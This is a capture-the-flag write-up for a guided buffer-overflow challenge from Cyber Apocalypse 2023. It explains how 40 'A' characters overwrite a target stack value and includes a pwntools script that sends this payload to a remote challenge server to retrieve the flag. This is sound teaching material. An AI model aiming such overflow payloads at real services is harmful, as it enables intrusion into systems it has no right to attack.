Cyber Apocalypse 2023

Getting Started

Solved by Legend

Challenge description

Get ready for the last guided challenge and your first real exploit. It’s time to show your hacking skills.

In this challenge a challenge binary is given and a wrapper.py file is given the code for buffer overflow.

Executing the binary shows the Stack frame layout.

After that it shows the stack with Address and Value along with indicators to where is the start of the buffer and what is the Target that needs to be changed.

Then it shows what happens if we put A’s and B’s as input.

Then it asks us to enter A’s to get change the value in Target. I placed 40 A’s and it grave the testing flag.

Now same can we done in the given script to automate this.

#wrapper.py#!/usr/bin/python3.8

'''
You need to install pwntools to run the script.
To run the script: python3 ./wrapper.py
'''

# Library
from pwn import *

# Open connection
IP   = '165.232.98.69' # Change this
PORT = 32238      # Change this

r    = remote(IP, PORT)

# Craft payload
payload = b'A' * 40 # Change the number of "A"s

# Send payload
r.sendline(payload)

# Read flag
success(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}')

Running the script gave the flag.